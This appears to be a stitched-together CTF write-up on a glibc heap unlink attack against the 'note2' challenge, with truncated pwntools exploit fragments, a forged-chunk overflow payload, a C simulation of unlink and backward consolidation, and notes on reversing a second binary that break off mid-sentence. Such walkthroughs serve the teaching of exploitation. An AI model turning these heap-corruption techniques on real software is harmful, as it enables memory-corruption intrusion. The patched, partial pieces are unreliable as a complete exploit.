```python
from pwn import *

# Reconstructed: the source starts mid-function, so the process handle, the
# newnote() header and the menu selection (option 1 = new note, as in the
# second script on this page) are restored here from context.
io = process('./note2')

def newnote(size, content):
    io.recvuntil('option--->>')
    io.sendline('1')
    io.recvuntil('Input the length of the note content:(less than 128)')
    io.sendline(str(size))
    io.recvuntil('Input the note content:')
    io.sendline(content)

def show(num):
    io.recvuntil('option--->>')
    io.sendline('2')
    # the rest of show() is cut off in the source
```
Free chunk1, overwrite chunk2, then free chunk2. The corresponding code:

```python
# edit the chunk1 to overwrite the chunk2
deletenote(1)
content = 'a' * 16 + p64(0xa0) + p64(0x90)
newnote(0, content)
# delete note 2 to trigger the unlink
# after unlink, ptr[0] = ptr - 0x18
deletenote(2)
```

First chunk1 is freed; since this chunk...
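What happens inside free() when deletenote(2) runs, as an added example that is not from the writeup or either exploit script on this page: a C model of the glibc 2.23 unlink macro and of the backward-consolidation step in free(), run against the same layout (a fake free chunk written into note0's content, a 0x20 chunk for the size-0 note1, a 0x90 victim chunk for note2, and chunk2's header rewritten by the overflow to prev_size = 0xa0, size = 0x90). The names `notes[]` and `heap[]`, the chunk sizes 0x91/0x21/0x91 and the fake chunk size 0xa0 are simulation assumptions; nothing here talks to the real binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREV_INUSE 0x1UL

/* glibc-style chunk header; for free chunks it is followed by fd/bk. */
struct chunk {
    uint64_t prev_size;
    uint64_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Stand-in (assumed layout) for note2's global pointer table in .bss; the
   writeup's "ptr" is &notes[0]. Typed as struct chunk * so the model stays
   well-typed when unlink reads and writes through it. */
struct chunk *notes[4];

/* Simulated heap: chunk0 (0x90) | chunk1 (0x20) | chunk2 (0x90) | slack. */
static _Alignas(16) uint8_t heap[0x90 + 0x20 + 0x90 + 0x40];

static struct chunk *chunk_at(size_t off) { return (struct chunk *)(heap + off); }
static uint8_t *mem_of(struct chunk *c) { return (uint8_t *)c + 0x10; } /* chunk2mem */

/* The glibc 2.23 unlink macro reduced to its pointer round-trip check.
   Returns 0 on success, -1 where glibc aborts with
   "corrupted double-linked list". */
static int unlink_chunk(struct chunk *P) {
    struct chunk *FD = P->fd, *BK = P->bk;
    if (FD->bk != P || BK->fd != P) return -1;
    FD->bk = BK;
    BK->fd = FD;
    return 0;
}

/* Backward consolidation in free() for a non-fastbin chunk: when PREV_INUSE
   is clear, the previous chunk is found via prev_size and unlinked.
   Returns 0 on merge, 1 if the previous chunk was in use, -1 on abort. */
static int free_consolidate_backward(struct chunk *c) {
    if (c->size & PREV_INUSE) return 1;
    struct chunk *prev = (struct chunk *)((uint8_t *)c - c->prev_size);
    return unlink_chunk(prev);
}

/* Rebuild the writeup's layout and trigger. Returns 1 when notes[0] ends up
   equal to &notes[0] - 0x18, -1 when unlink rejected the fake chunk,
   0 otherwise. forge_fd_correctly == 0 plants a non-round-tripping fd. */
int run_unlink_attack(int forge_fd_correctly) {
    memset(heap, 0, sizeof heap);
    memset(notes, 0, sizeof notes);
    struct chunk *chunk0 = chunk_at(0x00);
    struct chunk *chunk1 = chunk_at(0x90);
    struct chunk *chunk2 = chunk_at(0xb0);
    chunk0->size = 0x91;   /* 0x80 note plus header, PREV_INUSE set */
    chunk1->size = 0x21;   /* the size-0 note lands in a 0x20 fastbin chunk */
    chunk2->size = 0x91;
    notes[0] = (struct chunk *)mem_of(chunk0);
    notes[1] = (struct chunk *)mem_of(chunk1);
    notes[2] = (struct chunk *)mem_of(chunk2);

    /* Fake free chunk built inside note0's content, so P == notes[0]. */
    uintptr_t ptr = (uintptr_t)&notes[0];
    struct chunk *fake = notes[0];
    fake->size = 0xa0;  /* agrees with the prev_size forged below */
    fake->fd = forge_fd_correctly ? (struct chunk *)(ptr - 0x18) : fake; /* fd->bk == *ptr */
    fake->bk = (struct chunk *)(ptr - 0x10);                              /* bk->fd == *ptr */

    /* The over-long write into reallocated note1: 16 filler bytes, then
       chunk2's prev_size = 0xa0 and size = 0x90 (PREV_INUSE cleared). */
    uint8_t overflow[0x20];
    memset(overflow, 'a', 0x10);
    uint64_t prev_size = 0xa0, size = 0x90;
    memcpy(overflow + 0x10, &prev_size, sizeof prev_size);
    memcpy(overflow + 0x18, &size, sizeof size);
    memcpy(mem_of(chunk1), overflow, sizeof overflow);

    /* deletenote(2): free() sees PREV_INUSE clear, walks back 0xa0 bytes to
       the fake chunk and unlinks it, writing through &notes[0] twice. */
    int rc = free_consolidate_backward(chunk2);
    if (rc != 0) return rc < 0 ? -1 : 0;
    return (uintptr_t)notes[0] == ptr - 0x18;
}

int main(void) {
    printf("forged fd/bk: %d\n", run_unlink_attack(1));
    printf("wrong fd:     %d\n", run_unlink_attack(0));
    return 0;
}
```

`run_unlink_attack(1)` returns 1 because `notes[0]` now holds `&notes[0] - 0x18`, which is the `ptr[0] = ptr - 0x18` of the comment in the code above; `run_unlink_attack(0)` returns -1 because `fd->bk` no longer points back at the fake chunk. Caveat: glibc 2.26 and later additionally require the size of the chunk being unlinked to equal the next chunk's prev_size; the model keeps the fake size at 0xa0 so the layout would satisfy that check too, but it implements only the 2.23-era pointer check.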
```python
from pwn import *

p = process('./note2')
note2 = ELF('./note2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'

def newnote(length, content):
    p.recvuntil('option--->>')
    p.sendline('1')
    p.recvuntil('(less than 128)')
    p.sendline(str(length))
    # the remainder of this function is cut off in the source
```
The code base is fairly large, and reversing it is hard. The feature set is quite complete, it has everything:
main function
add function: there is a heap array and no PIE protection, so consider unlink
show function: can be used to leak addresses
edit function: there are two edit modes
delete: can't find a UAF bug
I looked for a long time and couldn't find the vulnerability, I'm hopeless. Later I read a master's blog and found the vulnerability point, in a...